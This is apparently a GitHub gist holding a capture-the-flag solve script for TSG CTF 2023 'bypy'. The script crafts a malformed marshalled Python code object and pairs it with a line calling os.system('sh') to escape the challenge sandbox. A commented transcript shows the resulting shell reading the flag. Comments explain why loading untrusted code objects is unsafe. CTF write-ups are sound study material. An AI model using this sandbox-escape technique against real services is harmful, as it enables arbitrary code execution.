@lebr0nli
Last active November 5, 2023 09:19
TSG CTF 2023 - bypy (pwn)
import base64
import dis
import marshal
import subprocess
from opcode import opmap
# CTF solve script (TSG CTF 2023, "bypy"): hand-assembles a CPython code
# object from raw opcodes, serializes it with marshal and prints it
# base64-encoded, followed by one extra text line, as the input the
# challenge's executor expects (see the commented transcript below).
#
# NOTE(review): a marshalled code object is executable data. marshal does
# not validate bytecode or its index operands, so any service that
# marshal.loads() and runs caller-supplied code objects is accepting
# arbitrary code execution; the mitigation is to not accept serialized
# code objects from untrusted input at all, not to filter their contents.

# Placeholder function: only its __code__ slot is used, and that is
# replaced below.
def f(): pass

# Raw bytecode. Each entry is an opcode (looked up by name in opmap so the
# numeric values follow the running interpreter) followed by its argument
# byte and, for BINARY_SUBSCR and CALL, trailing zero bytes.
# NOTE(review): the trailing zeros look like inline-cache slots of a
# 3.11+/3.12-era opcode layout (RESUME, COPY, SWAP, CALL), so the byte
# string is interpreter-version specific — confirm against the
# challenge's python3 before reusing.
code: bytes = bytes(
[
opmap['RESUME'], 0,
opmap['LOAD_CONST'], 227,
opmap['UNPACK_EX'], 29,
opmap['BUILD_TUPLE'], 28,
opmap['POP_TOP'], 0,
opmap['SWAP'], 2,
opmap['POP_TOP'], 0,
opmap['LOAD_CONST'], 227,
opmap['SWAP'], 2,
opmap['BINARY_SUBSCR'], 0, 0, 0,
opmap['COPY'], 1,
opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
opmap['LOAD_CONST'], 227,
opmap['UNPACK_EX'], 21,
opmap['BUILD_TUPLE'], 20,
opmap['POP_TOP'], 0,
opmap['SWAP'], 2,
opmap['POP_TOP'], 0,
opmap['LOAD_CONST'], 227,
opmap['SWAP'], 2,
opmap['BINARY_SUBSCR'], 0, 0, 0,
opmap['SWAP'], 2,
opmap['CALL'], 0, 0, 0, 0, 0, 0, 0,
opmap['RETURN_VALUE'], 0,
]
)
# dis.dis(code)
# Swap in the raw bytes and empty every name/constant table. The
# LOAD_CONST operands (227) exceed the now-empty co_consts tuple, so the
# object is not a well-formed code object by compiler rules; a consumer
# that checked index operands against the tables would reject it.
f.__code__ = f.__code__.replace(co_code=code, co_names=(), co_consts=(), co_cellvars=(), co_freevars=(), co_varnames=())
# Serialize the code object and base64 it: this is the "source" line the
# executor reads first (see the transcript below).
payload: bytes = base64.b64encode(marshal.dumps(f.__code__))
# Second line, appended after a newline; presumably consumed by the
# executor as a separate input() read — verify against executor.py.
payload += b"\nloads.__self__.__loader__.load_module('os').system('sh')\n"
print(payload.decode())
# subprocess.run(["python3", "./executor.py"], input=payload)
# Give me your source:
# 4wAAAAAAAAAAAAAAAAAAAAADAAAA80AAAACXAGTjXh1mHAEAYwIBAGTjYwIZAAAAeAGrAAAAAAAAAGTjXhVmFAEAYwIBAGTjYwIZAAAAYwKrAAAAAAAAAFMAqQByAgAAAHICAAAA8wAAAAD6FS9ob21lL3VidW50dS9zb2x2ZS5wedoBZnIFAAAABwAAAPMCAAAAgQByAwAAAA==
# loads.__self__.__loader__.load_module('os').system('sh')<built-in function input>
# ls
# executor.py
# flag-9b949bf8bdf1beef0f7a9f4a7ef46c12
# start.sh
# cat flag*
# TSGCTF{our_caffeine_knight_slays_python_bytes}